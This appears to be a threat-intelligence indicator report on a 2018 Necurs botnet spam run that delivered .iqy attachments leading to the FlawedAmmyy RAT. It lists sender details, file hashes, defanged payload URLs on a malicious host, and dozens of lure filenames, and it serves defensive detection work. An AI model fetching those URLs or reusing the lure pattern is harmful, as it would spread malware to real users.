Necurs botnet sending out malspam which contains a IQY file attachment and the final payload appears to be FlawedAmmyy RAT.
Date/time:
2018-06-07T12:20:32
“sender” from:
“Rodney” <Rodney@mymoroccanguide[.]com>
Sender IP: 2.180.246.245
ASN: N/A
ISP: N/A
Last hop: 2.180.34.38
Shodan.io / Censys.io for lasthop(s):
https://www.shodan.io/2.180.34.38
https://www.censys.io/ipv4/2.180.34.38
Headers received:
from [2[.]180[.]246[.]245] (unknown [2[.]180[.]34[.]38]) by ; Thu, 7 Jun 2018 12:20:32 +0000 (UTC)
Helo:
2[.]180[.]246[.]245
Headers x-mailer:
none
Subject line(s):
discount_30_41979464
Message Body:
“”
Attachments:
Name: discount_30_41979464.iqy
MD5: d2cbfe913c6c526ff0be6030c673dcf0
SHA1: 33956c69b3c0c714a3649788a637dfb63d22f128
SHA256: 28d391bf7aa72d59a387bfaba099d9e176ee976959a4f99b8d04dbeef75e76b5
SHA512: a2af6e73b95bb11dbaec53d1a4db9c7f01991bebae25ff99de90611e8c2075e5ec83b81975b620d3d2b8491f17fd21027a1b9932c06e8bb9464b17d1ad17660e
File type: ASCII text, with CRLF line terminators
File size: 69
Attachment downloads:
hxxp://thespecsupportservice.com/duo.dat
Name: duo.dat
MD5: 4a5776ff12c18112ca4732d01807d41e
SHA1: 02f24bd0958587c13149ec7c7ab66eec7c3c4629
SHA256: 602a7a3c6a49708a336d4c9bf63c1bd3f94e885ef7784be62e866462fe36b942
File type: ASCII text, with CRLF line terminators
File size: 181
hxxp://thespecsupportservice.com/uno.dat
Name: uno.dat
MD5: 4afc6ee5265a10af09d8479108b3a460
SHA1: 14423e725381dff490c25852774bb2757a51cabd
SHA256: 7c641ae9bfacad1e4d1d0feef3ec9e97c55c6bd66812f5d9cf2a47ba40a16dd4
File type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
File size: 316
hxxp://thespecsupportservice.com/dr.png
Name: dr.png
MD5: 28eae907ea38b050cbdcc82bb623c00a
SHA1: 713641142230fc3489cd1c4e942859890f600079
SHA256: 7f9cedd1b67cd61ba68d3536ee67efc1140bdf790b02da7aab4e5657bf48bb6f
File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
File size: 178780
Host details:
20180607, 95.213.251.149, AS49505, OOO Network of data-centers Selectel, hxxp://thespecsupportservice.com, Russia
https://community.riskiq.com/search/95.213.251.149
https://community.riskiq.com/search/certificate/sha1/a3f1333fe242bfcfc5d14e8f394298406810d1a0
Alternate subject lines (minus extension) and file names:
Purchase_1088448116174_07062018.iqy
promo_50_97288459.iqy_
Purchase_9732055_07062018.iqy
offer_30_109534361.iqy
Purchase_2603683074_07062018.iqy
promo_20_68412850.iqy
Order_4450324710_07062018.iqy
offer_20_3205423.iqy
promo_50_651077479.iqy
Purchase Order_9106867360_07062018.iqy
offer_50_127289968.iqy
promo_20_4070866.iqy
Order_7849285_07062018.iqy
offer_20_39474306.iqy
sale_20_580211605.iqy
offer_50_472189386.iqy
sale_30_04773200.iqy
Purchase_38665739_07062018.iqy
sale_20_12529067.iqy
promo_20_3925954.iqy
sale_30_753901522.iqy
coupon_30_159080077.iqy
Purchase Order_8130741_07062018.iqy
sale_30_159716279.iqy
PO_8588956717_07062018.iqy
offer_30_1303440.iqy
Order_6978236525663_07062018.iqy
sale_30_4938874.iqy
promo_20_58542814.iqy
Purchase Order_9190333989_07062018.iqy
coupon_20_95197460.iqy
coupon_20_6242746.iqy
sale_50_904595642.iqy
promo_20_159091579.iqy
sale_50_3688273.iqy
promo_50_116702919.iqy
Also reported by @dvk01uk & @executemalware
new Necurs igy spam run [email protected] Random name in body hxxp://thespecsupportservice.com/duo.dat hxxp://thespecsupportservice.com/uno.dat
— My Online Security (@dvk01uk) June 7, 2018
hxxp://thespecsupportservice.com/dr.png renamed.exe
hxxp://thespecsupportservice.com/load.png Encoded binary https://t.co/cOYgbIuc8O pic.twitter.com/8xpetUkTkj
Here is some info on the flood of .iqy #malspam I've seen today as well as some details of the infection flow.#flawedammyyhttps://t.co/pPJGHFazQR
— ExecuteMalware (@executemalware) June 7, 2018
Find more recent and related IOCs Necurs Botnet Delivering FlawedAmmyy RAT - 2018-05-25